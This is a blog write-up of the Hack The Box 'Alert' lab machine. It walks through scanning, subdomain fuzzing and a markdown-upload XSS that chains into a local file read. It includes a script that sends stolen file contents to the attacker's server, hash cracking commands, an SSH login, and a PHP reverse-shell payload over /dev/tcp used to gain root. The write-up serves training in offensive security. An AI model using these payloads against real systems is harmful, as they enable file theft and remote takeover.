Zwique
  • $ whoami
  • $ Writeups
    • HackTheBox
      • Alert
      • UnderPass
      • Code
    • Random CTF Writeup
      • Local
        • The First Half: Reloaded
        • sumPrimes revenge
        • Embrace the randomness
        • Guess a password
        • "Hello World" Guide
        • Klaun
        • RSA tutorial
      • BearcatCTF 2024
        • Shimbles the E-L-F
        • Easy Encrypt
        • sqRSA
      • Noob RSA Returns
      • Catching The Bus
  • Achievements
    • Certificates
    • Accomplishments
Powered by GitBook
On this page
  • Reconnaissance
  • Nmap Scanning Process
  • Identifying Bugs
  • Exploitation
  • User Flag
  • Root Flag
  1. $ Writeups
  2. HackTheBox

Alert

Writeup of Alert machine

PreviousHackTheBoxNextUnderPass

Last updated 14 days ago

Machine

Reconnaissance

Nmap Scanning Process

Nmap, a network discovery tool, involves several steps:

  1. Host Discovery: Identify live hosts using ICMP, TCP, or UDP packets.

  2. Port Scanning: Scan for open ports on discovered hosts.

  3. Service Detection: Determine running services and versions on open ports.

  4. OS Detection: Detect the operating system of remote hosts.

  5. Script Scanning: Use Nmap scripts for tasks like vulnerability detection.

  6. Output Options: Save results in various formats for analysis or reporting.

These steps aid in mapping network topology and assessing security. The picture shows the machine has two open ports. 80 & 22.

  • Port 80: This port is commonly used for HTTP (Hypertext Transfer Protocol) traffic, which forms the foundation of the web. It is the default port for web servers to accept requests from web browsers over an unencrypted connection.

  • Port 22: Known as the default port for SSH (Secure Shell), it allows secure management and data transfer over unsecured networks. SSH is commonly used for remote server management and secure file transfers.

Subdomain Discovery Using Fuzzing Method

The fuzzing method involves sending a series of test inputs to identify valid subdomains for a given domain. The ffuf (Fuzz Faster U Fool) tool can be used to automate this process by:

  1. Command Structure: The basic command format includes the target domain, header options, and wordlist.

  2. URL and Header: Specify the URL you are targeting and use the -H option to set a header with a placeholder (FUZZ) for potential subdomains.

  3. Wordlist: Utilize a wordlist containing common subdomain names to systematically test each entry. The -w option specifies the path to this list.

  4. Status Code Filtering: Use -fc to filter out certain HTTP status codes (e.g., 301) to focus on potential subdomains that yield different responses.

This fuzzy testing helps uncover hidden or unlisted subdomains by systematically trying each entry in the provided wordlist.

ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 301

http://statistics.alert.htb -> Asked Username & Password

http://alert.htb -> Output below

Identifying Bugs

Burp Suite is a powerful web vulnerability scanner and testing framework used primarily for assessing the security of web applications.

Exploitation

Hosting a Malicious Server

python3 -m http.server 8888

Malicious Markdown File (MD File)

<script>
fetch("http://alert.htb/messages.php?file=filepath")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
  });
</script>
//xx.xx => Should be replaced by your local IP

The application's LFI vulnerability was exploited when this file was uploaded in order to get private files and send their contents to my Python server. I received the vulnerable 'filepath'.

.htpasswd file, a flat-file used to store usernames and password for basic authentication on an Apache HTTP Server.

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
  });
</script>

User Flag

So, the encrypted password of the user will be:

%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
username -> albert
encrypted password as a hash -> $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

1600

Apache $apr1$ MD5, md5apr1, MD5 (APR)

Hashcat is a powerful password recovery tool that supports many hashing algorithms and attack modes. It is known for its speed, versatility, and GPU acceleration, making it ideal for security testing and forensics.

hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash.txt

BOOM!!!

Go login as a user and read the user.txt file.

ssh albert@10.10.11.44

Root Flag

Privilege Escalation

LinPEAS.sh is a script designed to enumerate possible paths to escalate privileges on Linux systems. It automates the process of searching for potential vulnerabilities and misconfigurations that could be exploited to gain higher-level access, making it a useful tool for system administrators and security professionals in identifying and mitigating risks.

Open port: 8080

ssh -L 8080:127.0.0.1:8080 albert@alert.htb

Testing the open port locally using ssh

The most interesting part is that the /opt directory has root permissions, providing a great opportunity to upload our shell and execute it from the browser.

1

Create shell.php file

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.**.**/4444 0>&1'"); ?>
2

Insert the file into /opt/website-monitor/config directory

3

Start netcat listener

nc -lnvp 4444
4

Execute the shell from the port 8080

http://127.0.0.1:8080/config/shell.php

Through analysis, it is clear that the page accepts a markdown (.md) file as input and visualizes. After doing some tests on Burpsuite, I suspected the and decided to try.

Our payload will look like

To get the password of user, I accessed the vulnerable file from statistics subdomain, where it was initially asking user's username and password.

Put it on the CyberChef and decode it by URL Decoding Recipe :

In order decrypt the password, we need to identify the type of hash. Here, I used and got it

Since hashcat requires quite huge amount of memory, you can use .

Accessing Locally

The End!!!

Thank you!!!

👏
🔚
🙏
XXS injection
.htpasswd
Result
hashcat cheatsheet
john the ripper tool
LogoJoin The Best Hacking Community Worldwide | Hack The BoxHack The Box
Link
Owned Alert from Hack The Box!
Result of Nmap
Finding sub-domain by Fuzzing
Web
Uploading the payload
Triggering the exploit
Output
Password of user